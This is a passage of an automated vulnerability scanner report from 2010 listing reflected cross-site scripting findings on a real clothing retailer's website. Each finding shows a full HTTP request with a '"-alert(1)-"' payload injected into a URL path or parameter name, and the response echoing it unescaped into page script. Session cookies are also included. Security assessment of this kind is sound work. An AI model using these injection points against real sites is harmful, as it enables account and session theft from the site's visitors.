This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear18143"-alert(1)-"e6c8aea808b/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=huq0q65u4sj1fui2uj3fk73st0; expires=Tue, 09-Nov-2010 17:03:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear18143"-alert(1)-"e6c8aea808b/men/");
//]]>
...[SNIP]...

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f12a"-alert(1)-"42752903dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men5f12a"-alert(1)-"42752903dcc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=334i604v3jd1ug35amqrq6l7u1; expires=Tue, 09-Nov-2010 17:03:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men5f12a"-alert(1)-"42752903dcc/");
//]]>
...[SNIP]...

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db67"-alert(1)-"5e26043ec8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men/?9db67"-alert(1)-"5e26043ec8f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vuvttoa5vopkerom16e92pksb7; expires=Tue, 09-Nov-2010 17:01:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men/?9db67"-alert(1)-"5e26043ec8f=1");
//]]>
...[SNIP]...

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be5b"-alert(1)-"e5744c4501f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear2be5b"-alert(1)-"e5744c4501f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=96c2h4h8g79gg428a0hbandns1; expires=Tue, 09-Nov-2010 17:03:25 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear2be5b"-alert(1)-"e5744c4501f/women/");
//]]>
...[SNIP]...

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd108"-alert(1)-"bc1e04530ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/womencd108"-alert(1)-"bc1e04530ca/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=15409u7iamhegudvk9knvhonk7; expires=Tue, 09-Nov-2010 17:03:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/womencd108"-alert(1)-"bc1e04530ca/");
//]]>
...[SNIP]...

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0969"-alert(1)-"29b7f4c9995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/women/?e0969"-alert(1)-"29b7f4c9995=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c9jgs8fku50oedu974bmbvk176; expires=Tue, 09-Nov-2010 17:01:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/women/?e0969"-alert(1)-"29b7f4c9995=1");
//]]>
...[SNIP]...

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e6b"-alert(1)-"4e4750c7287 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage53e6b"-alert(1)-"4e4750c7287/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=afjfsg3q3tnjk7fmq9un82i3k1; expires=Tue, 09-Nov-2010 17:15:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage53e6b"-alert(1)-"4e4750c7287/");
//]]>
...[SNIP]...

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c544"-alert(1)-"71287e91efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage/?3c544"-alert(1)-"71287e91efc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hsq46ceu74v30ore5bqq9q21q2; expires=Tue, 09-Nov-2010 17:15:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Heritag
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage/?3c544"-alert(1)-"71287e91efc=1");
//]]>
...[SNIP]...

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8616c"-alert(1)-"7472e7ac244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home8616c"-alert(1)-"7472e7ac244/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=14d13cht96sn9sc03rpij71181; expires=Tue, 09-Nov-2010 17:24:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home8616c"-alert(1)-"7472e7ac244/");
//]]>
...[SNIP]...

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6784a"-alert(1)-"467c737cd18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/?6784a"-alert(1)-"467c737cd18=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l2h90hssa4fmthjqbs1gomlmj5; expires=Tue, 09-Nov-2010 17:23:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home/?6784a"-alert(1)-"467c737cd18=1");
//]]>
...[SNIP]...

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c636"-alert(1)-"401eb60e513 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js1c636"-alert(1)-"401eb60e513/index.php HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8m0oqsmc1sc72tf5e0msm0em36; expires=Tue, 09-Nov-2010 17:15:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/js1c636"-alert(1)-"401eb60e513/index.php");
//]]>
...[SNIP]...

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"-alert(1)-"3736105445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kidsefe09"-alert(1)-"3736105445/kidswear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kp6jr7pki4in7iu19bvd9202h2; expires=Tue, 09-Nov-2010 17:24:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kidsefe09"-alert(1)-"3736105445/kidswear/");
//]]>
...[SNIP]...

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4731"-alert(1)-"b278de41763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidsweard4731"-alert(1)-"b278de41763/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gds6c6cpusu9o67aien66qr4r4; expires=Tue, 09-Nov-2010 17:24:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidsweard4731"-alert(1)-"b278de41763/");
//]]>
...[SNIP]...

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561cd"-alert(1)-"d72a8d8d292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=38gi6i5her1s7f5m53m7icsk66; expires=Tue, 09-Nov-2010 17:23:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Kidswea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1");
//]]>
